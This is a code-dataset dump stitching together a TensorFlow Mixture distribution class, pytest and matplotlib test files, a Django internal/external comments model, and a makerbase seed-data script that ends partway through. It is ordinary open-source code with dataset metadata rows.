array_ops.concat([[n_class * batch_size], event_shape], 0))
samples_class_c = array_ops.gather(
samples_class_c, lookup_partitioned_batch_indices,
name="samples_class_c_gather")
samples_class[c] = samples_class_c
# Stitch back together the samples across the components.
lhs_flat_ret = data_flow_ops.dynamic_stitch(
indices=partitioned_samples_indices, data=samples_class)
# Reshape back to proper sample, batch, and event shape.
ret = array_ops.reshape(lhs_flat_ret,
array_ops.concat([samples_shape,
self.event_shape_tensor()], 0))
ret.set_shape(
tensor_shape.TensorShape(static_samples_shape).concatenate(
self.event_shape))
return ret
def entropy_lower_bound(self, name="entropy_lower_bound"):
r"""A lower bound on the entropy of this mixture model.
The bound below is not always very tight, and its usefulness depends
on the mixture probabilities and the components in use.
A lower bound is useful for ELBO when the `Mixture` is the variational
distribution:
\\(
\log p(x) >= ELBO = \int q(z) \log p(x, z) dz + H[q]
\\)
where \\( p \\) is the prior distribution, \\( q \\) is the variational,
and \\( H[q] \\) is the entropy of \\( q \\). If there is a lower bound
\\( G[q] \\) such that \\( H[q] \geq G[q] \\) then it can be used in
place of \\( H[q] \\).
For a mixture of distributions \\( q(Z) = \sum_i c_i q_i(Z) \\) with
\\( \sum_i c_i = 1 \\), by the concavity of \\( f(x) = -x \log x \\), a
simple lower bound is:
\\(
\begin{align}
H[q] & = - \int q(z) \log q(z) dz \\\
& = - \int (\sum_i c_i q_i(z)) \log(\sum_i c_i q_i(z)) dz \\\
& \geq - \sum_i c_i \int q_i(z) \log q_i(z) dz \\\
& = \sum_i c_i H[q_i]
\end{align}
\\)
This is the term we calculate below for \\( G[q] \\).
Args:
name: A name for this operation (optional).
Returns:
A lower bound on the Mixture's entropy.
"""
with self._name_scope(name, values=[self.cat.logits]):
with ops.control_dependencies(self._assertions):
distribution_entropies = [d.entropy() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
partial_entropies = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_entropies)
]
# These are all the same shape by virtue of matching batch_shape
return math_ops.add_n(partial_entropies)
def _cat_probs(self, log_probs):
"""Get a list of num_components batchwise probabilities."""
which_softmax = nn_ops.log_softmax if log_probs else nn_ops.softmax
cat_probs = which_softmax(self.cat.logits)
cat_probs = array_ops.unstack(cat_probs, num=self.num_components, axis=-1)
return cat_probs
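# A minimal usage sketch (not part of the original file). The `normal` import
# and every parameter value below are hypothetical; any list of matching
# `Distribution` objects can serve as `components`.
def _example_mixture_usage():
  from tensorflow.contrib.distributions.python.ops import normal
  cat = categorical.Categorical(logits=[-1.0, 1.0])
  components = [normal.Normal(loc=-1.0, scale=0.5),
                normal.Normal(loc=2.0, scale=1.0)]
  gm = Mixture(cat=cat, components=components)
  # Sampling and log-density evaluation are batched exactly as described in
  # the class docstring above.
  return gm.sample(5), gm.log_prob([0.0])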
| 42
| 80
| 0.671193
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import categorical
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
class Mixture(distribution.Distribution):
def __init__(self,
cat,
components,
validate_args=False,
allow_nan_stats=True,
name="Mixture"):
parameters = locals()
if not isinstance(cat, categorical.Categorical):
raise TypeError("cat must be a Categorical distribution, but saw: %s" %
cat)
if not components:
raise ValueError("components must be a non-empty list or tuple")
if not isinstance(components, (list, tuple)):
raise TypeError("components must be a list or tuple, but saw: %s" %
components)
if not all(isinstance(c, distribution.Distribution) for c in components):
raise TypeError(
"all entries in components must be Distribution instances"
" but saw: %s" % components)
dtype = components[0].dtype
if not all(d.dtype == dtype for d in components):
raise TypeError("All components must have the same dtype, but saw "
"dtypes: %s" % [(d.name, d.dtype) for d in components])
is_continuous = components[0].is_continuous
if not all(d.is_continuous == is_continuous for d in components):
raise TypeError(
"All components must either be continuous or not, but continuity "
"values are: %s" % [(d.name, d.is_continuous) for d in components])
static_event_shape = components[0].event_shape
static_batch_shape = cat.batch_shape
for d in components:
static_event_shape = static_event_shape.merge_with(d.event_shape)
static_batch_shape = static_batch_shape.merge_with(d.batch_shape)
if static_event_shape.ndims is None:
raise ValueError(
"Expected to know rank(event_shape) from components, but "
"none of the components provide a static number of ndims")
with ops.name_scope(name, values=[cat.logits]) as ns:
num_components = cat.event_size
static_num_components = tensor_util.constant_value(num_components)
if static_num_components is None:
raise ValueError(
"Could not infer number of classes from cat and unable "
"to compare this value to the number of components passed in.")
static_num_components = int(static_num_components)
if static_num_components != len(components):
raise ValueError("cat.num_classes != len(components): %d vs. %d" %
(static_num_components, len(components)))
cat_batch_shape = cat.batch_shape_tensor()
cat_batch_rank = array_ops.size(cat_batch_shape)
if validate_args:
batch_shapes = [d.batch_shape_tensor() for d in components]
batch_ranks = [array_ops.size(bs) for bs in batch_shapes]
check_message = ("components[%d] batch shape must match cat "
"batch shape")
self._assertions = [
check_ops.assert_equal(
cat_batch_rank, batch_ranks[di], message=check_message % di)
for di in range(len(components))
]
self._assertions += [
check_ops.assert_equal(
cat_batch_shape, batch_shapes[di], message=check_message % di)
for di in range(len(components))
]
else:
self._assertions = []
self._cat = cat
self._components = list(components)
self._num_components = static_num_components
self._static_event_shape = static_event_shape
self._static_batch_shape = static_batch_shape
graph_parents = self._cat._graph_parents
for c in self._components:
graph_parents += c._graph_parents
super(Mixture, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
is_continuous=is_continuous,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=ns)
@property
def cat(self):
return self._cat
@property
def components(self):
return self._components
@property
def num_components(self):
return self._num_components
def _batch_shape_tensor(self):
return self._cat.batch_shape_tensor()
def _batch_shape(self):
return self._static_batch_shape
def _event_shape_tensor(self):
return self._components[0].event_shape_tensor()
def _event_shape(self):
return self._static_event_shape
def _mean(self):
with ops.control_dependencies(self._assertions):
distribution_means = [d.mean() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
static_event_rank = self.event_shape.ndims
def expand(x):
expanded_x = x
for _ in range(static_event_rank):
expanded_x = array_ops.expand_dims(expanded_x, -1)
return expanded_x
cat_probs = [expand(c_p) for c_p in cat_probs]
partial_means = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_means)
]
return math_ops.add_n(partial_means)
def _log_prob(self, x):
with ops.control_dependencies(self._assertions):
x = ops.convert_to_tensor(x, name="x")
distribution_log_probs = [d.log_prob(x) for d in self.components]
cat_log_probs = self._cat_probs(log_probs=True)
final_log_probs = [
cat_lp + d_lp
for (cat_lp, d_lp) in zip(cat_log_probs, distribution_log_probs)
]
concat_log_probs = array_ops.stack(final_log_probs, 0)
log_sum_exp = math_ops.reduce_logsumexp(concat_log_probs, [0])
return log_sum_exp
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _sample_n(self, n, seed=None):
with ops.control_dependencies(self._assertions):
n = ops.convert_to_tensor(n, name="n")
static_n = tensor_util.constant_value(n)
n = int(static_n) if static_n is not None else n
cat_samples = self.cat.sample(n, seed=seed)
static_samples_shape = cat_samples.get_shape()
if static_samples_shape.is_fully_defined():
samples_shape = static_samples_shape.as_list()
samples_size = static_samples_shape.num_elements()
else:
samples_shape = array_ops.shape(cat_samples)
samples_size = array_ops.size(cat_samples)
static_batch_shape = self.batch_shape
if static_batch_shape.is_fully_defined():
batch_shape = static_batch_shape.as_list()
batch_size = static_batch_shape.num_elements()
else:
batch_shape = self.batch_shape_tensor()
        batch_size = math_ops.reduce_prod(batch_shape)
static_event_shape = self.event_shape
if static_event_shape.is_fully_defined():
event_shape = np.array(static_event_shape.as_list(), dtype=np.int32)
else:
event_shape = self.event_shape_tensor()
samples_raw_indices = array_ops.reshape(
math_ops.range(0, samples_size), samples_shape)
partitioned_samples_indices = data_flow_ops.dynamic_partition(
data=samples_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
batch_raw_indices = array_ops.reshape(
array_ops.tile(math_ops.range(0, batch_size), [n]), samples_shape)
partitioned_batch_indices = data_flow_ops.dynamic_partition(
data=batch_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
samples_class = [None for _ in range(self.num_components)]
for c in range(self.num_components):
n_class = array_ops.size(partitioned_samples_indices[c])
seed = distribution_util.gen_new_seed(seed, "mixture")
samples_class_c = self.components[c].sample(n_class, seed=seed)
lookup_partitioned_batch_indices = (
batch_size * math_ops.range(n_class) +
partitioned_batch_indices[c])
samples_class_c = array_ops.reshape(
samples_class_c,
array_ops.concat([[n_class * batch_size], event_shape], 0))
samples_class_c = array_ops.gather(
samples_class_c, lookup_partitioned_batch_indices,
name="samples_class_c_gather")
samples_class[c] = samples_class_c
lhs_flat_ret = data_flow_ops.dynamic_stitch(
indices=partitioned_samples_indices, data=samples_class)
ret = array_ops.reshape(lhs_flat_ret,
array_ops.concat([samples_shape,
self.event_shape_tensor()], 0))
ret.set_shape(
tensor_shape.TensorShape(static_samples_shape).concatenate(
self.event_shape))
return ret
def entropy_lower_bound(self, name="entropy_lower_bound"):
with self._name_scope(name, values=[self.cat.logits]):
with ops.control_dependencies(self._assertions):
distribution_entropies = [d.entropy() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
partial_entropies = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_entropies)
]
return math_ops.add_n(partial_entropies)
def _cat_probs(self, log_probs):
which_softmax = nn_ops.log_softmax if log_probs else nn_ops.softmax
cat_probs = which_softmax(self.cat.logits)
cat_probs = array_ops.unstack(cat_probs, num=self.num_components, axis=-1)
return cat_probs
| true
| true
|
1c421d28381f9d123cea2b322a695d6ce0506811
| 3,350
|
py
|
Python
|
tests/h/util/session_tracker_test.py
|
julien-cheng/h
|
36c8ec044725720cf36f0986cdf025395aca8929
|
[
"BSD-2-Clause"
] | 2
|
2019-08-04T07:22:11.000Z
|
2020-07-17T05:01:41.000Z
|
tests/h/util/session_tracker_test.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | null | null | null |
tests/h/util/session_tracker_test.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import unicode_literals
from uuid import uuid4
import pytest
from sqlalchemy.orm.util import identity_key
from h.db.types import _get_urlsafe_from_hex
from h.models import Annotation, Document
from h.util.session_tracker import Tracker, ObjectState
def generate_ann_id():
"""
Generate a random annotation identifier in the encoded form used by the API.
"""
return _get_urlsafe_from_hex(str(uuid4()))
class TestTracker(object):
def test_uncommitted_changes_returns_unflushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_returns_flushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
session.flush()
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_does_not_return_committed_changes(
self, tracker, session
):
session.commit()
assert tracker.uncommitted_changes() == []
def test_uncommitted_changes_does_not_return_rolled_back_changes(
self, tracker, session
):
session.rollback()
assert tracker.uncommitted_changes() == []
@pytest.fixture
def expected_changes(self, added_ann_id, changed_ann_id, deleted_ann_id):
added_entry = (identity_key(Annotation, (added_ann_id,)), ObjectState.ADDED)
changed_entry = (
identity_key(Annotation, (changed_ann_id,)),
ObjectState.CHANGED,
)
deleted_entry = (
identity_key(Annotation, (deleted_ann_id,)),
ObjectState.DELETED,
)
return (added_entry, changed_entry, deleted_entry)
@pytest.fixture
def added_ann_id(self):
return generate_ann_id()
@pytest.fixture
def changed_ann_id(self):
return generate_ann_id()
@pytest.fixture
def deleted_ann_id(self):
return generate_ann_id()
@pytest.fixture
def session(self, db_session, added_ann_id, changed_ann_id, deleted_ann_id):
# Populate the DB session with different types of change relative to the
# last-committed state. We could use any model object for this purpose
# but annotations are the primary object in the system.
doc = Document(web_uri="https://example.org")
changed = Annotation(
id=changed_ann_id, userid="foo", groupid="wibble", document=doc
)
deleted = Annotation(
id=deleted_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(changed)
db_session.add(deleted)
db_session.commit()
changed.text = "changed text"
db_session.delete(deleted)
added = Annotation(
id=added_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(added)
return db_session
@pytest.fixture
def tracker(self, db_session):
return Tracker(db_session)
| 30.18018
| 84
| 0.678507
|
from __future__ import unicode_literals
from uuid import uuid4
import pytest
from sqlalchemy.orm.util import identity_key
from h.db.types import _get_urlsafe_from_hex
from h.models import Annotation, Document
from h.util.session_tracker import Tracker, ObjectState
def generate_ann_id():
return _get_urlsafe_from_hex(str(uuid4()))
class TestTracker(object):
def test_uncommitted_changes_returns_unflushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_returns_flushed_changes(
self, tracker, session, expected_changes
):
added_entry, changed_entry, deleted_entry = expected_changes
session.flush()
changes = tracker.uncommitted_changes()
assert added_entry in changes
assert changed_entry in changes
assert deleted_entry in changes
def test_uncommitted_changes_does_not_return_committed_changes(
self, tracker, session
):
session.commit()
assert tracker.uncommitted_changes() == []
def test_uncommitted_changes_does_not_return_rolled_back_changes(
self, tracker, session
):
session.rollback()
assert tracker.uncommitted_changes() == []
@pytest.fixture
def expected_changes(self, added_ann_id, changed_ann_id, deleted_ann_id):
added_entry = (identity_key(Annotation, (added_ann_id,)), ObjectState.ADDED)
changed_entry = (
identity_key(Annotation, (changed_ann_id,)),
ObjectState.CHANGED,
)
deleted_entry = (
identity_key(Annotation, (deleted_ann_id,)),
ObjectState.DELETED,
)
return (added_entry, changed_entry, deleted_entry)
@pytest.fixture
def added_ann_id(self):
return generate_ann_id()
@pytest.fixture
def changed_ann_id(self):
return generate_ann_id()
@pytest.fixture
def deleted_ann_id(self):
return generate_ann_id()
@pytest.fixture
def session(self, db_session, added_ann_id, changed_ann_id, deleted_ann_id):
doc = Document(web_uri="https://example.org")
changed = Annotation(
id=changed_ann_id, userid="foo", groupid="wibble", document=doc
)
deleted = Annotation(
id=deleted_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(changed)
db_session.add(deleted)
db_session.commit()
changed.text = "changed text"
db_session.delete(deleted)
added = Annotation(
id=added_ann_id, userid="foo", groupid="wibble", document=doc
)
db_session.add(added)
return db_session
@pytest.fixture
def tracker(self, db_session):
return Tracker(db_session)
| true
| true
|
1c421d4c0b1c6e259ed2a537e534baf86c9bbbdc
| 1,603
|
py
|
Python
|
lib/matplotlib/tests/test_offsetbox.py
|
pmarshwx/matplotlib
|
12be528dbf2114f7c25abf60de8100cb2d4494af
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
lib/matplotlib/tests/test_offsetbox.py
|
pmarshwx/matplotlib
|
12be528dbf2114f7c25abf60de8100cb2d4494af
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
lib/matplotlib/tests/test_offsetbox.py
|
pmarshwx/matplotlib
|
12be528dbf2114f7c25abf60de8100cb2d4494af
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import nose
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import matplotlib.lines as mlines
from matplotlib.offsetbox import AnchoredOffsetbox, DrawingArea
@image_comparison(baseline_images=['offsetbox_clipping'], remove_text=True)
def test_offsetbox_clipping():
# - create a plot
# - put an AnchoredOffsetbox with a child DrawingArea
# at the center of the axes
# - give the DrawingArea a gray background
# - put a black line across the bounds of the DrawingArea
# - see that the black line is clipped to the edges of
# the DrawingArea.
fig, ax = plt.subplots()
size = 100
da = DrawingArea(size, size, clip=True)
bg = mpatches.Rectangle((0, 0), size, size,
facecolor='#CCCCCC',
edgecolor='None',
linewidth=0)
line = mlines.Line2D([-size*.5, size*1.5], [size/2, size/2],
color='black',
linewidth=10)
anchored_box = AnchoredOffsetbox(
loc=10,
child=da,
pad=0.,
frameon=False,
bbox_to_anchor=(.5, .5),
bbox_transform=ax.transAxes,
borderpad=0.)
da.add_artist(bg)
da.add_artist(line)
ax.add_artist(anchored_box)
ax.set_xlim((0, 1))
ax.set_ylim((0, 1))
if __name__ == '__main__':
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
| 32.06
| 75
| 0.621335
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import nose
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import matplotlib.lines as mlines
from matplotlib.offsetbox import AnchoredOffsetbox, DrawingArea
@image_comparison(baseline_images=['offsetbox_clipping'], remove_text=True)
def test_offsetbox_clipping():
fig, ax = plt.subplots()
size = 100
da = DrawingArea(size, size, clip=True)
bg = mpatches.Rectangle((0, 0), size, size,
facecolor='#CCCCCC',
edgecolor='None',
linewidth=0)
line = mlines.Line2D([-size*.5, size*1.5], [size/2, size/2],
color='black',
linewidth=10)
anchored_box = AnchoredOffsetbox(
loc=10,
child=da,
pad=0.,
frameon=False,
bbox_to_anchor=(.5, .5),
bbox_transform=ax.transAxes,
borderpad=0.)
da.add_artist(bg)
da.add_artist(line)
ax.add_artist(anchored_box)
ax.set_xlim((0, 1))
ax.set_ylim((0, 1))
if __name__ == '__main__':
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
| true
| true
|
1c421d50e973debea0380ade73241e0e1bcd3193
| 2,269
|
py
|
Python
|
internal_external_comments/models.py
|
ortkin/django-internal-external-comments
|
ea608c34398549ca053d7b50a19cc8f614f91bf5
|
[
"MIT"
] | null | null | null |
internal_external_comments/models.py
|
ortkin/django-internal-external-comments
|
ea608c34398549ca053d7b50a19cc8f614f91bf5
|
[
"MIT"
] | null | null | null |
internal_external_comments/models.py
|
ortkin/django-internal-external-comments
|
ea608c34398549ca053d7b50a19cc8f614f91bf5
|
[
"MIT"
] | null | null | null |
from django.db import models
from django_comments.abstracts import CommentAbstractModel
from django_comments.managers import CommentManager
from django.contrib.sites.models import Site
from django.urls import reverse
class InternalExternalCommentManager(CommentManager):
def for_site(self, site=None):
if site is None:
site = Site.objects.get_current()
return self.filter(site=site)
def valid(self):
return self.for_site().filter(is_removed=False, is_public=True)
class InternalExternalComment(CommentAbstractModel):
INTERNAL = 'internal'
EXTERNAL = 'external'
INTERNAL_EXTERNAL_CHOICES = (
(INTERNAL, 'Internal'),
(EXTERNAL, 'External'),
)
internal_external = models.CharField(max_length=8,
choices=INTERNAL_EXTERNAL_CHOICES,
default=INTERNAL,)
objects = InternalExternalCommentManager()
class Meta(object):
verbose_name = 'Comment'
verbose_name_plural = 'Comments'
permissions = (
("can_post_internal", "Can post internal message"),
("can_delete_internal", "Can delete internal message"),
("can_edit_internal", "Can edit internal message"),
("can_view_internal", "Can view internal message"),
("can_delete_external", "Can delete external message"),
("can_edit_external", "Can edit external message"),
)
def __str__(self):
return "{}: {}".format(self.user or self.user_name, self.comment)
@property
def is_internal(self):
return self.internal_external == self.INTERNAL
@property
def data(self):
return {
"pk": self.pk,
"comment": self.comment,
"user": self.user.username if self.user else "",
"object_pk": self.object_pk,
"content_type_id": self.content_type_id,
"submit_date": str(self.submit_date),
}
def get_content_object_url(self):
"""
Get a URL suitable for redirecting to the content object.
"""
return reverse(
"comments-url-redirect",
args=(self.content_type_id, self.object_pk)
)
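    # Illustrative sketch (not part of the original model): the manager and the
    # permissions above are typically combined when rendering a thread; the
    # view code and app label below are hypothetical.
    #
    #     comments = InternalExternalComment.objects.valid()
    #     if not request.user.has_perm(
    #             "internal_external_comments.can_view_internal"):
    #         comments = comments.exclude(
    #             internal_external=InternalExternalComment.INTERNAL)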
| 32.414286
| 75
| 0.619216
|
from django.db import models
from django_comments.abstracts import CommentAbstractModel
from django_comments.managers import CommentManager
from django.contrib.sites.models import Site
from django.urls import reverse
class InternalExternalCommentManager(CommentManager):
def for_site(self, site=None):
if site is None:
site = Site.objects.get_current()
return self.filter(site=site)
def valid(self):
return self.for_site().filter(is_removed=False, is_public=True)
class InternalExternalComment(CommentAbstractModel):
INTERNAL = 'internal'
EXTERNAL = 'external'
INTERNAL_EXTERNAL_CHOICES = (
(INTERNAL, 'Internal'),
(EXTERNAL, 'External'),
)
internal_external = models.CharField(max_length=8,
choices=INTERNAL_EXTERNAL_CHOICES,
default=INTERNAL,)
objects = InternalExternalCommentManager()
class Meta(object):
verbose_name = 'Comment'
verbose_name_plural = 'Comments'
permissions = (
("can_post_internal", "Can post internal message"),
("can_delete_internal", "Can delete internal message"),
("can_edit_internal", "Can edit internal message"),
("can_view_internal", "Can view internal message"),
("can_delete_external", "Can delete external message"),
("can_edit_external", "Can edit external message"),
)
def __str__(self):
return "{}: {}".format(self.user or self.user_name, self.comment)
@property
def is_internal(self):
return self.internal_external == self.INTERNAL
@property
def data(self):
return {
"pk": self.pk,
"comment": self.comment,
"user": self.user.username if self.user else "",
"object_pk": self.object_pk,
"content_type_id": self.content_type_id,
"submit_date": str(self.submit_date),
}
def get_content_object_url(self):
return reverse(
"comments-url-redirect",
args=(self.content_type_id, self.object_pk)
)
| true
| true
|
1c421dabaf6d795cc19ab256b3f39a700a58b938
| 5,702
|
py
|
Python
|
data.py
|
markpasc/makerbase
|
d35bc9da8fc843806465c2159b220cb8ca9234f6
|
[
"MIT"
] | 4
|
2015-02-12T19:18:11.000Z
|
2015-07-30T18:45:48.000Z
|
data.py
|
markpasc/makerbase
|
d35bc9da8fc843806465c2159b220cb8ca9234f6
|
[
"MIT"
] | null | null | null |
data.py
|
markpasc/makerbase
|
d35bc9da8fc843806465c2159b220cb8ca9234f6
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
import makerbase
from makerbase.models import *
"""
user: {
'id':
'name':
'avatar_url':
'html_url':
<link to person?>
}
maker: {
'name':
'avatar_url':
'html_url':
}
project: {
'name':
'description':
'avatar_url':
'html_url':
}
participation: {
<link to person>
<link to project>
'role': "140 char description"
'start_year': 2012
'start_month': 0
'end_year': 2012
    'end_month': 1
}
history: {
<link to user>
'action': '[create edit]'
'reason': "140 char description"
'when': <iso8601 timestamp>
'new': { obj data? }
}
"""
def blit(cls, ident):
obj = cls.get(ident)
if obj is not None:
obj.delete()
def empty_bucket(cls):
keys = cls.get_bucket().get_keys()
for key in keys:
blit(cls, key)
for cls in (Project, Maker, Participation, History):
empty_bucket(cls)
def now():
somewhen = datetime(2012, 4, 11, 13, 0, 0)
while True:
yield somewhen.isoformat()
somewhen += timedelta(minutes=1)
now = now()
editor = User(
'github:markpasc',
name='Mark Paschal',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
html_url='https://github.com/markpasc',
)
editor.save()
mlkshk = Project(
'mlkshk',
name='MLKSHK',
description='A site for sharing pictures.',
html_url='http://mlkshk.com/',
avatar_url='https://mlkshk.com/r/2NOE',
)
mlkshk.save()
h = History(
action='addproject',
reason='new project',
when=now.next(),
old_data={},
new_data=mlkshk.get_entity_data(),
).add_link(editor, tag='user').add_link(mlkshk, tag='project')
h.save()
mlkshk.add_link(h, tag='history').save()
me = Maker(
'markpasc',
name='Mark Paschal',
html_url='http://markpasc.org/mark/',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?s=140&d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
)
me.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=me.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker')
h.save()
me.add_link(h, tag='history').save()
andre = Maker(
'torrez',
name='Andre Torrez',
html_url='http://torrez.org/',
avatar_url='https://si0.twimg.com/profile_images/1788942159/black-log.gif',
)
andre.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=andre.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker')
h.save()
andre.add_link(h, tag='history').save()
amber = Maker(
'amber',
name='Amber Costley',
html_url='http://ambercostley.com/',
avatar_url='https://si0.twimg.com/profile_images/1452719858/twit.jpg',
)
amber.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=amber.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker')
h.save()
amber.add_link(h, tag='history').save()
party = Participation(
role='Creator and programmer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(andre, tag='maker')
party.save()
andre.add_link(party, tag='participation')
andre.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with andre on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker').add_link(mlkshk, tag='project')
h.save()
andre.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Creator and designer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(amber, tag='maker')
party.save()
amber.add_link(party, tag='participation')
amber.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with amber on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker').add_link(mlkshk, tag='project')
h.save()
amber.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Contract API programmer & test writer',
start_month=4,
start_year=2011,
end_month=5,
end_year=2011,
)
party.save()
party.add_link(me, tag='maker')
party.add_link(mlkshk, tag='project')
party.save()
me.add_link(party, tag='participation')
me.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='i worked on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker').add_link(mlkshk, tag='project')
h.save()
me.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
anildash = Maker(
'anildash',
name='Anil Dash',
html_url='http://dashes.com/anil/about.html',
avatar_url='https://si0.twimg.com/profile_images/1364557668/image_reasonably_small.jpg',
)
anildash.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=anildash.get_entity_data(),
).add_link(editor, tag='user').add_link(anildash, tag='maker')
h.save()
anildash.add_link(h, tag='history').save()
| 21.598485
| 177
| 0.659418
|
from datetime import datetime, timedelta
import makerbase
from makerbase.models import *
def blit(cls, ident):
obj = cls.get(ident)
if obj is not None:
obj.delete()
def empty_bucket(cls):
keys = cls.get_bucket().get_keys()
for key in keys:
blit(cls, key)
for cls in (Project, Maker, Participation, History):
empty_bucket(cls)
def now():
somewhen = datetime(2012, 4, 11, 13, 0, 0)
while True:
yield somewhen.isoformat()
somewhen += timedelta(minutes=1)
now = now()
editor = User(
'github:markpasc',
name='Mark Paschal',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
html_url='https://github.com/markpasc',
)
editor.save()
mlkshk = Project(
'mlkshk',
name='MLKSHK',
description='A site for sharing pictures.',
html_url='http://mlkshk.com/',
avatar_url='https://mlkshk.com/r/2NOE',
)
mlkshk.save()
h = History(
action='addproject',
reason='new project',
when=now.next(),
old_data={},
new_data=mlkshk.get_entity_data(),
).add_link(editor, tag='user').add_link(mlkshk, tag='project')
h.save()
mlkshk.add_link(h, tag='history').save()
me = Maker(
'markpasc',
name='Mark Paschal',
html_url='http://markpasc.org/mark/',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?s=140&d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
)
me.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=me.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker')
h.save()
me.add_link(h, tag='history').save()
andre = Maker(
'torrez',
name='Andre Torrez',
html_url='http://torrez.org/',
avatar_url='https://si0.twimg.com/profile_images/1788942159/black-log.gif',
)
andre.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=andre.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker')
h.save()
andre.add_link(h, tag='history').save()
amber = Maker(
'amber',
name='Amber Costley',
html_url='http://ambercostley.com/',
avatar_url='https://si0.twimg.com/profile_images/1452719858/twit.jpg',
)
amber.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=amber.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker')
h.save()
amber.add_link(h, tag='history').save()
party = Participation(
role='Creator and programmer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(andre, tag='maker')
party.save()
andre.add_link(party, tag='participation')
andre.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with andre on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker').add_link(mlkshk, tag='project')
h.save()
andre.add_link(h, tag='history').save()
